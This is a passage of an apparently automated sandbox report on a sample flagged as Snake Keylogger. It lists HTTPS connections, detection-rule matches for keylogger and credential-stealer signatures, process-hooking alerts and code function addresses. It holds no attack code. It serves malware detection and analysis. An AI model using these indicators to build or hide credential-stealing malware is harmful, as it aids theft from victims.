            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56930
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56810
            Source: unknownNetwork traffic detected: HTTP traffic on port 56828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
            Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
            Source: unknownNetwork traffic detected: HTTP traffic on port 56900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56827
            Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56829
            Source: unknownNetwork traffic detected: HTTP traffic on port 56911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56825
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
            Source: unknownNetwork traffic detected: HTTP traffic on port 56806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56820
            Source: unknownNetwork traffic detected: HTTP traffic on port 56862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
            Source: unknownNetwork traffic detected: HTTP traffic on port 56922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
            Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56798
            Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56924 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56922 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50124 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50167 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50181 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50270 version: TLS 1.2

            System Summary

            barindex
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00F4D63C0_2_00F4D63C
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_072422780_2_07242278
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1B3289_2_02B1B328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1C1909_2_02B1C190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B161089_2_02B16108
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B167309_2_02B16730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1F7789_2_02B1F778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1C7529_2_02B1C752
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1E4319_2_02B1E431
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1C4739_2_02B1C473
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B14AD99_2_02B14AD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1CA329_2_02B1CA32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1BBB89_2_02B1BBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B198589_2_02B19858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1BEB09_2_02B1BEB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1D7F09_2_02B1D7F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1D7E09_2_02B1D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B1B4F29_2_02B1B4F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B135729_2_02B13572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06757E789_2_06757E78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06750D609_2_06750D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067575889_2_06757588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067532889_2_06753288
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06757E379_2_06757E37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675D6189_2_0675D618
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06756E009_2_06756E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06757E0F9_2_06757E0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675D6099_2_0675D609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675AEEF9_2_0675AEEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675DEC89_2_0675DEC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675DEB89_2_0675DEB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675E7789_2_0675E778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675E7689_2_0675E768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675AF009_2_0675AF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675B7B09_2_0675B7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675B7A09_2_0675B7A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067577A89_2_067577A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F4719_2_0675F471
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675BC089_2_0675BC08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C4B89_2_0675C4B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067504A09_2_067504A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C4A89_2_0675C4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067504919_2_06750491
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F4809_2_0675F480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675CD689_2_0675CD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06750D509_2_06750D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675CD589_2_0675CD58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675DA709_2_0675DA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675327B9_2_0675327B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675DA639_2_0675DA63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675B3589_2_0675B358
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675B3489_2_0675B348
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675E3209_2_0675E320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675E3109_2_0675E310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675BBF89_2_0675BBF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675EBD09_2_0675EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675EBC19_2_0675EBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C0609_2_0675C060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C0509_2_0675C050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067500409_2_06750040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F0289_2_0675F028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F0189_2_0675F018
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067500079_2_06750007
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067508F09_2_067508F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F8D89_2_0675F8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675F8C99_2_0675F8C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C9109_2_0675C910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067509009_2_06750900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675C9039_2_0675C903
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675D1C09_2_0675D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0675D1B09_2_0675D1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678D2189_2_0678D218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678A6009_2_0678A600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678B2909_2_0678B290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678BF309_2_0678BF30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06788B009_2_06788B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678CBD09_2_0678CBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06789FB09_2_06789FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678AC489_2_0678AC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678B8E09_2_0678B8E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06780D489_2_06780D48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067885B09_2_067885B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678C5809_2_0678C580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06785E709_2_06785E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06785E609_2_06785E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06785A189_2_06785A18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06785A089_2_06785A08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678D20B9_2_0678D20B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EE0F9_2_0678EE0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067836D89_2_067836D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067862C89_2_067862C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067862BB9_2_067862BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678B2819_2_0678B281
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06786B789_2_06786B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06786B699_2_06786B69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067833609_2_06783360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067833509_2_06783350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067867209_2_06786720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678BF209_2_0678BF20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067867139_2_06786713
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06786FF89_2_06786FF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067843D89_2_067843D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678CBC09_2_0678CBC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06789FA09_2_06789FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067828589_2_06782858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067874509_2_06787450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067828489_2_06782848
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067800409_2_06780040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678003D9_2_0678003D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678743F9_2_0678743F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678AC379_2_0678AC37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067808F09_2_067808F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06787CF09_2_06787CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067808E19_2_067808E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678B8D09_2_0678B8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067878A89_2_067878A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067804989_2_06780498
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067878989_2_06787898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067804889_2_06780488
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678C5709_2_0678C570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067881589_2_06788158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067881489_2_06788148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067851409_2_06785140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06780D399_2_06780D39
